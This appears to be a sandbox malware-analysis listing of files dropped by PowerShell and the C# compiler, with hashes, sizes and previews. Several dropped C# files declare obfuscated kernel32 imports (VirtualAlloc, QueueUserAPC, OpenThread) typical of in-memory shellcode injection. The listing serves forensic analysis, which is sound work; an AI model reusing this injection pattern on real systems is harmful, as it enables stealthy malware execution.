                  Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\fyriofhk\fyriofhk.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\fyriofhk\fyriofhk.0.cs"
                  C:\Users\user\AppData\Local\Temp\fyriofhk\fyriofhk.dll
                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                  Category:dropped
                  Size (bytes):3584
                  Entropy (8bit):2.6172047281029736
                  Encrypted:false
                  SSDEEP:24:etGSU8OmU0t3lm85z7ntQW6gfg1gG4laUtkZfLXOBX3VUWI+ycuZhNKqYakS7qN8:6uXQ3r5u2arJjOxF31ulKxa37Kq
                  MD5:FB76CE97EC044EE6640693192CC1C1DC
                  SHA1:F525422E8BEA37B3711F127DDA5A8C98B961E00A
                  SHA-256:50F13EC370D385AEE109024AAC6F2ABC1288C147BC94B318C02571D9C1D136E0
                  SHA-512:CCA27850FA596CFDDCE9148AC699C0A85A3282DE79B650525BF25784687CECD810663C8BB8315A3C2F58B1B54D2A040E405B6C7561839EBC29747ABD32BD4C1C
                  Malicious:false
                  Reputation:unknown
                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....k.a...........!.................$... ...@....... ....................................@..................................#..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..\.............................................................(....*BSJB............v4.0.30319......l...H...#~......<...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................2.+...................................................... 9............ F............ Y.....P ......d.........j.....q.....v.....................d. ...d...!.d.%...d.......*.....3.1.....9.......F.......Y...........
                  C:\Users\user\AppData\Local\Temp\fyriofhk\fyriofhk.out
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                  Category:modified
                  Size (bytes):869
                  Entropy (8bit):5.311260397013452
                  Encrypted:false
                  SSDEEP:24:KBId3ka6KHJE81uKaM5DqBVKVrdFAMBJTH:Ukka6AJE81uKxDcVKdBJj
                  MD5:A27D6300BC7C1BD10919A1A9CDB9E244
                  SHA1:6F69FB52FFFFC162E7ACFDE725AF0B10CCA83980
                  SHA-256:A507F9D99054E884FEED0F0158F4E429BA332C472E2470BA04C25C4DB1B0922C
                  SHA-512:756323EB66DC8E17570F60EB846CD9363FB59B2DD613B6951B97923B5D96E90BCAD48D225BF62CE1ABD4D7AD34049D24E2F2160823865E8A0BF6CA810AC7E8A7
                  Malicious:false
                  Reputation:unknown
                  Preview: .C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\fyriofhk\fyriofhk.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\fyriofhk\fyriofhk.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                  C:\Users\user\AppData\Local\Temp\mrf10rqm\CSC601F2F65325C4ADC8E494E5EE1FB1173.TMP
                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                  File Type:MSVC .res
                  Category:dropped
                  Size (bytes):0
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry6iGak7YnqqXiXPN5Dlq5J:+RI+ycuZhNSakSKPNnqX
                  MD5:BFE65E353F3068EB1815ECFFAA610E16
                  SHA1:BB3EA43F19FEBA29BB364F455959D3136200C297
                  SHA-256:F82D3D6026B9F7AB7FC37269244717B003B408A2010ABA5D7AF266C07EDC4B2D
                  SHA-512:58D35B356AA8972C150F5244FB68417ADFED6E500ADCD980855F6AA8897E3108856DF33D21E76BFD85AB3D8B14701628B523A0748E112A329068B023AEB4FE40
                  Malicious:false
                  Reputation:unknown
                  Preview: .... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...m.r.f.1.0.r.q.m...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...m.r.f.1.0.r.q.m...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                  C:\Users\user\AppData\Local\Temp\mrf10rqm\mrf10rqm.0.cs
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:UTF-8 Unicode (with BOM) text
                  Category:dropped
                  Size (bytes):394
                  Entropy (8bit):4.954749753951787
                  Encrypted:false
                  SSDEEP:6:V/DsYLDS81zuJqvFMmMRSRa+eNMjSSRrA3/MLqevVSRN9HRRcMzy:V/DTLDfuKFMM9eg5rmMOe8nRRcQy
                  MD5:4F00714F1C09E141DB020803EA09579D
                  SHA1:D7980DF2EB35C87A8B0970CACD97DB01F3AF3053
                  SHA-256:3849E6268E834D1AE7C9D9C9A8073383600D6E3B16FCF19D4EDA5AEFD3AB702C
                  SHA-512:27A50F4C4E088993854043C472B93BB3E4D4B49942349A2A320DECD7E1F4F50FDF55C0ADAC1929626767E670B6DF94EE020CC8794D70C11CDC11D58043EF14A4
                  Malicious:false
                  Reputation:unknown
                  Preview: .using System;.using System.Runtime.InteropServices;..namespace W32.{. public class uai. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint vjsthgo,uint ssavaddinvx);.[DllImport("kernel32")].public static extern IntPtr VirtualAlloc(IntPtr gexlvnsp,uint sjhv,uint hya,uint gdlnrobpny);.. }..}.
                  C:\Users\user\AppData\Local\Temp\mrf10rqm\mrf10rqm.cmdline
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                  Category:dropped
                  Size (bytes):369
                  Entropy (8bit):5.245729470602234
                  Encrypted:false
                  SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2WXp+N23f8pUSzxs7+AEszIWXp+N23f8pUX:p37Lvkmb6KH0LWZE80m
                  MD5:886FA0662E66DAEB013CC4F2A828676D
                  SHA1:D3985A2F3A1B997065D3DD113B0CB2D137F6C6F5
                  SHA-256:F59EF10434E610F5A71E0D70A5B6857A0F2A96765907B9FEF71FECFB81C2EF30
                  SHA-512:9D289919442596D7E1BAAAF88CC68981431423FE7826023D8A0A5468A20DDA04E09571D931FB25DD64CADB42BC170A181952749568822A3BE79B531D7EF0F9BF
                  Malicious:false
                  Reputation:unknown
                  Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\mrf10rqm\mrf10rqm.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\mrf10rqm\mrf10rqm.0.cs"
                  C:\Users\user\AppData\Local\Temp\mrf10rqm\mrf10rqm.dll
                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                  Category:dropped
                  Size (bytes):0
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:24:etGSf/W2dg85xsF2uhyjEdWJHiXE4tkZfQBC3+WI+ycuZhNSakSKPNnq:6Wkb5xs0WWQXEvJQk3l1ulSa3mq
                  MD5:E591D86B7166B06E68E3D6CBA6F29066
                  SHA1:651E2287C8D762B5979A509820C1B84F8C770467
                  SHA-256:F1566B1CE05582D8F0E49FD2FB54B8A6E6744F84C5D4712EAF8DB1B749B29FA2
                  SHA-512:80CE1D11483ED65267E6116D6B13BB90E834B52E1493515C89E6F25E557932F90DFC886B787B603AC0C0DF8B0CE9EBA9AAE73ADC38C6BF01FEBF25726D92005B
                  Malicious:false
                  Reputation:unknown
                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....k.a...........!.................#... ...@....... ....................................@..................................#..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..X.............................................................(....*BSJB............v4.0.30319......l...H...#~......8...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................/.(...................................................... 6............ H............ P.....P ......].........c.....k.....w.....................]. ...]...!.].%...].......*.....3.-.....6.......H.......P...........
                  C:\Users\user\AppData\Local\Temp\mrf10rqm\mrf10rqm.out
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                  Category:modified
                  Size (bytes):869
                  Entropy (8bit):5.329605194560862
                  Encrypted:false
                  SSDEEP:24:KBId3ka6KH0oE80nKaM5DqBVKVrdFAMBJTH:Ukka6A0oE80nKxDcVKdBJj
                  MD5:69D57DC70587EE41EE6FC274B97FBDC4
                  SHA1:FC2A8C8DB75263ABD2ED0ADCD6D239384B3D9D29
                  SHA-256:18A0DB10515984FBFFF5A28AD3AB93F471F4ABBC0F84CEA4BB9D1232A6FD5E19
                  SHA-512:8A821A329AB1813CDB71CE5E5451619E2CE108AB0261FAE2FAD6C1167806304109B25A766451FD1A69E0EC45C6914E65D4D203C8CAD4C59363F65D63AB72C5C3
                  Malicious:false
                  Reputation:unknown
                  Preview: .C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\mrf10rqm\mrf10rqm.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\mrf10rqm\mrf10rqm.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                  C:\Users\user\AppData\Local\Temp\vgn3eu5f\vgn3eu5f.0.cs
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:UTF-8 Unicode (with BOM) text
                  Category:dropped
                  Size (bytes):394
                  Entropy (8bit):4.954749753951787
                  Encrypted:false
                  SSDEEP:6:V/DsYLDS81zuJqvFMmMRSRa+eNMjSSRrA3/MLqevVSRN9HRRcMzy:V/DTLDfuKFMM9eg5rmMOe8nRRcQy
                  MD5:4F00714F1C09E141DB020803EA09579D
                  SHA1:D7980DF2EB35C87A8B0970CACD97DB01F3AF3053
                  SHA-256:3849E6268E834D1AE7C9D9C9A8073383600D6E3B16FCF19D4EDA5AEFD3AB702C
                  SHA-512:27A50F4C4E088993854043C472B93BB3E4D4B49942349A2A320DECD7E1F4F50FDF55C0ADAC1929626767E670B6DF94EE020CC8794D70C11CDC11D58043EF14A4
                  Malicious:false
                  Reputation:unknown
                  Preview: .using System;.using System.Runtime.InteropServices;..namespace W32.{. public class uai. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint vjsthgo,uint ssavaddinvx);.[DllImport("kernel32")].public static extern IntPtr VirtualAlloc(IntPtr gexlvnsp,uint sjhv,uint hya,uint gdlnrobpny);.. }..}.
                  C:\Users\user\AppData\Local\Temp\vgn3eu5f\vgn3eu5f.cmdline
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                  Category:dropped
                  Size (bytes):369
                  Entropy (8bit):5.2623236115134135
                  Encrypted:false
                  SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2WXp+N23fw2Uzxs7+AEszIWXp+N23fwYxn:p37Lvkmb6KHdUWZE8H
                  MD5:7AFBF2E681460BED047FE8606BB88A8B
                  SHA1:8BD211876DE82170D6D0B4BB4E5CE5D2593021B6
                  SHA-256:4EBBA379828F24674CB618231BCD93CA520B607BA69376738955CA2D209BE68B
                  SHA-512:B6A022C58973BFF36AC564C8C5912041FE07B8C1BFAE2881F42066D5AC8474190A53795F5C8441AD63531F02232C0F1CA0AE805D160CCCB6B3CDD85B3A7AB480
                  Malicious:false
                  Reputation:unknown
                  Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\vgn3eu5f\vgn3eu5f.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\vgn3eu5f\vgn3eu5f.0.cs"
                  C:\Users\user\AppData\Local\Temp\vgn3eu5f\vgn3eu5f.out
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                  Category:dropped
                  Size (bytes):869
                  Entropy (8bit):5.323550511577163
                  Encrypted:false
                  SSDEEP:24:KBId3ka6KHd1E8OKaM5DqBVKVrdFAMBJTH:Ukka6Ad1E8OKxDcVKdBJj
                  MD5:81CD4AC130F4B307EE5B4E0E15CCC0E5
                  SHA1:15E1B28E3690B20C95A3475AF35DD7B9C4F38C8E
                  SHA-256:99BCBB563864549E10FFE9DEEFCEB7FC2E849EC57B1373929727868AD7D38138
                  SHA-512:349E5DF5AB221BC793AF73A95A0A4EC733EEBB311BDD5C9DDB9026A0D34D2245E9D11D4FC03D96EE495BF8EA0F5E361E6D4D787FA1EAF1836EFED147EA426860
                  Malicious:false
                  Reputation:unknown
                  Preview: .C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\vgn3eu5f\vgn3eu5f.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\vgn3eu5f\vgn3eu5f.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                  C:\Users\user\AppData\Local\Temp\yycrjy0w\CSCDAC2BC21A294475B86B2FDF784B11415.TMP
                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                  File Type:MSVC .res
                  Category:dropped
                  Size (bytes):652
                  Entropy (8bit):3.0934843000967462
                  Encrypted:false
                  SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryAGak7YnqqxXPN5Dlq5J:+RI+ycuZhN+GakSxXPNnqX
                  MD5:9174B218226BE56C4CD87EE735492908
                  SHA1:582CB61774C2D7A46D907227164240507FB1BDB2
                  SHA-256:59A46E7B85BD7402B2A768A58E25135C88AD1F6D757909FF2D80286B447BA0A8
                  SHA-512:D20690D5C6530C8F8D7036D9BB4361B61D476A8C39D8D97F1A10F1FB4E4954E0C535AC4535B44E613E9C355856CC6AF684EC2E859A23A10B16907BD044FAD579
                  Malicious:false
                  Reputation:unknown
                  Preview: .... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...y.y.c.r.j.y.0.w...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...y.y.c.r.j.y.0.w...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                  C:\Users\user\AppData\Local\Temp\yycrjy0w\yycrjy0w.0.cs
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:UTF-8 Unicode (with BOM) text
                  Category:dropped
                  Size (bytes):404
                  Entropy (8bit):5.001750205738985
                  Encrypted:false
                  SSDEEP:6:V/DsYLDS81zuJMQGMRSR7a1kqcmYWSRa+rVSSRnA/fepw6V2XeYy:V/DTLDfuQabYN9rV5nA/2+6V+zy
                  MD5:E67A79EEB8705BEA96347DF090918E43
                  SHA1:95FF21FB152D1292B6DCDD128421D4EC938E2D48
                  SHA-256:D808E7944F6D224E6207EAD29CB1B7DD234016FC9C0AA7B7208FC7D6233E4CD8
                  SHA-512:9F3EAD7E7320BB8D1BD336FF39A08FF2554240DD71A9C2931D8BB849B82FAF2FE14CA5222E5F3D9DC9F4897C9B4AF3AB9D05CA77924C7B3C38107A83CA85E51B
                  Malicious:false
                  Reputation:unknown
                  Preview: .using System;.using System.Runtime.InteropServices;..namespace W32.{. public class lguxor. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr lsfjmn,IntPtr xxqh,IntPtr xyrmxbtxwnl);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint mekkcqcdoju,uint nau,IntPtr tamno);.. }..}.
                  C:\Users\user\AppData\Local\Temp\yycrjy0w\yycrjy0w.cmdline
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                  Category:dropped
                  Size (bytes):369
                  Entropy (8bit):5.256621337379964
                  Encrypted:false
                  SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2WXp+N23fJnlnPcw0zxs7+AEszIWXp+N23fJx:p37Lvkmb6KHhxB0WZE8hxLn
                  MD5:3968715CE41315ECCD76459D8A7F9904
                  SHA1:A4F872BA3AB3C44F202B265FADC8481700B3F35C
                  SHA-256:098EF14FF7C24D658FBF01AA1C81C7A8880A80806EB977A528CA2CC965771129
                  SHA-512:8B26FC4C452985438EB9DB5A4F997919D3B65284E33C7268B30B2B8664314376EA1649BD52C883974575A30DB8CF7BCC41E416CC7D87CC3FCC1DD46301F2D9D2
                  Malicious:false
                  Reputation:unknown
                  Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\yycrjy0w\yycrjy0w.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\yycrjy0w\yycrjy0w.0.cs"
                  C:\Users\user\AppData\Local\Temp\yycrjy0w\yycrjy0w.dll
                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                  Category:dropped
                  Size (bytes):3584
                  Entropy (8bit):2.618769412218819
                  Encrypted:false
                  SSDEEP:24:etGS+8OmU0t3lm85z7ntQW6gfgy4G4laUtkZfdB1PVUWI+ycuZhN+GakSxXPNnq:64XQ3r5uyIarJd7d31ulfa3Dq
                  MD5:14794C5CBC72372901D57A29463D22ED
                  SHA1:E3ACB06DEC8EC09BE03058791EC488C21E851921
                  SHA-256:524F5BBA17D2276F5D9C399869EEAFEAD277AB4C1522EDB2E80AFCC93CBCE4B8
                  SHA-512:C09DA7EB7A67A0569AB3851E5519D4AE7EB3EF4AEF9C53C232BDDF705538B4FC6D8CC2F2C8FDFC5BBB5228EBFB85AC94F452D3410AE3AF573594447D81C2B178
                  Malicious:false
                  Reputation:unknown
                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....k.a...........!.................$... ...@....... ....................................@..................................#..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..\.............................................................(....*BSJB............v4.0.30319......l...H...#~......<...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................2.+...................................................... 9............ F............ Y.....P ......d.........j.....q.....v.....................d. ...d...!.d.%...d.......*.....3.1.....9.......F.......Y...........
                  C:\Users\user\AppData\Local\Temp\yycrjy0w\yycrjy0w.out
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                  Category:modified
                  Size (bytes):869
                  Entropy (8bit):5.339496088869603
                  Encrypted:false
                  SSDEEP:24:KBId3ka6KHXBVE8XLuKaM5DqBVKVrdFAMBJTH:Ukka6AXBVE8XKKxDcVKdBJj
                  MD5:DD1A32B626FFCFCA67E15CE3537C5FC7
                  SHA1:9BBB242076BB8503966A9AE8AB393AA8B51FC046
                  SHA-256:006F5049A96F0532763D824FAF59B2D067367FCDB6E08BFC78525DF97BB19337
                  SHA-512:2C1BC12D6031A7835888541E9BF66F08C4D43890F39043CCC6918B20035B754560A9FED2D1687289A65BA3BF7A67550C439C54B2372130080D6B34E357518C98
                  Malicious:false
                  Reputation:unknown
                  Preview: .C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\yycrjy0w\yycrjy0w.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\yycrjy0w\yycrjy0w.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                  C:\Users\user\AppData\Local\Temp\~DF1A1A38B1DEC70135.TMP
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):16384
                  Entropy (8bit):0.2949748206217375
                  Encrypted:false
                  SSDEEP:24:i9l8Tfb2NOfZ8NtzT4BVleaTMg3PYW5KygBW:PmOfZctylBMg3tKyg
                  MD5:895CBAD826E1ACC5ABFE50890B0C45A6
                  SHA1:75E03ECA141239CFAD81E6AE7955616DF8CE5914
                  SHA-256:0534D5B0990ACC36F3496371610F116BF449249C542CF6EF60DFB179BFAD57B1
                  SHA-512:DF5010049F6315988527EE2EC93D04BED10A7A7D64674B276717EB604F7EDDD736D7C9770820D45EA2F1D3112D96788619D760A861248C75020A3F6618FEDFF8
                  Malicious:false
                  Reputation:unknown
                  Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  C:\Users\user\AppData\Local\Temp\~DF1E4DB491563E663B.TMP
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):16384
                  Entropy (8bit):0.3016902554707898
                  Encrypted:false
                  SSDEEP:12:i9lsqatYod2DzwwvzGeWq8FgKl843F32MrLc8lKFptlTyab+I2M49vtQbbe+/F:i9lsEod2fwcOq8Fg8xNlKjXb63MHbT
                  MD5:0052BDBC1282CCD1768F091C6765BB65
                  SHA1:9DD99E79720EDF82C3CC9931534C470F61AEDD82
                  SHA-256:F2BAA2D36BB43942303670076B6CE541563EF057D1D7F066919F71099A66462E
                  SHA-512:F8B221100651EB0E3A60000CBE62B355E12143BE0F09B16F5AE7FBEF2224FEA7B3DEF34C9FE9F2331DDC406C15A8892AD6AEB0D9B2E6ECC6B003D01352A0D70B
                  Malicious:false
                  Reputation:unknown
                  Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  C:\Users\user\AppData\Local\Temp\~DF228A52FBB344471E.TMP
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):16384
                  Entropy (8bit):0.2930658705886158
                  Encrypted:false
                  SSDEEP:24:i9lxPkfX7s5Fc6lyxez5lLemyKmb9+/F/nubpy:UPkfX7s7cuRcmyK49+/
                  MD5:DA0A40C938FB4094F95460636DA9A678
                  SHA1:539DF81C5D201FD3FF86B5A3A941AEE5B7E30F4A
                  SHA-256:206569E054E8F7A7C1B201322A008076EC70EEF3EC210F053C76042AF435C4B1
                  SHA-512:A493F77EB36879FD599B7C1106F713EE5344DCB2652C9E275661B97F352F4067F73CC636A75540A8080380AD04C1CD5EB5DA12C7D5ACB6FEB4CA830CFA703775
                  Malicious:false
                  Reputation:unknown
                  Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  C:\Users\user\AppData\Local\Temp\~DF310076119A1B03ED.TMP
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):16384
                  Entropy (8bit):0.2944924438145546
                  Encrypted:false
                  SSDEEP:12:i9lcat/yj6DzA+IAdT7YkZkyvlVNKJ2lPMNlvg8CyXaKf/hM61/bhMD4/F:i9lRg6fA+IU8kayvvsdgCm61Vo4
                  MD5:A914F0DE4240B44E7DCB879209B08F41
                  SHA1:326B3A412D22D59B831ED162643094F5A55CF755
                  SHA-256:8384216E9C57451B1E6EDBBB50E9143779B66FFEBEE28F5D4F1626788D3C8051
                  SHA-512:552EB3F6A128F3BD904DD3A8915529FA8060E71255BB3BAF86C9CCBE4D57F089CE360B7D99C5DFF3F861CEFE064DFD0CB03FCAA197E139665B59B757BB3CC836
                  Malicious:false
                  Reputation:unknown
                  Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  C:\Users\user\AppData\Local\Temp\~DF3F633016F59AC3E1.TMP
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):16384
                  Entropy (8bit):0.3000156607787352
                  Encrypted:false
                  SSDEEP:12:i9lIqat0qwDzDOshZGAt0gonblc4RWYCQgKKgpKcYrp6/Jd7LhGjS/F:i9llqwfDOaGIpmq7apgpqN6S
                  MD5:D2304AF6095A03016E1CD21F7027CFF7
                  SHA1:D3E4AF6EF7AC436E8BEDE69014E9D3709BBFF21F
                  SHA-256:F2BC48DC81609B1D0531C4A88714E503904C6FFE35F3125032CF1893FD811995
                  SHA-512:1CBA9848ACBAA6E62A37AD9617C98B75512E2ACAE3C8E6B45435F3BD46C301599A3D2D4AD3F6D05D4C24535444C769C59A90ED1EA45B7476B327886AE6C87632
                  Malicious:false
                  Reputation:unknown
                  Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  C:\Users\user\AppData\Local\Temp\~DF5CE6EAEE725046DD.TMP
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):16384
                  Entropy (8bit):0.2932892700170092
                  Encrypted:false
                  SSDEEP:24:i9lRk6fXY/A7Gcl1JNHyOu8Fq6oQlEB2:ck6fXYkGcvTVFqXwEB
                  MD5:CB4DFAFB5A3C048C2791A9888F379B68
                  SHA1:86DCF318E57BEEABD3D53B9A44A3CD4FA026833C
                  SHA-256:8C493E52BA6AA75526E00A885199B55C8EEAE82EABE0105C340EF948F63A2F5B
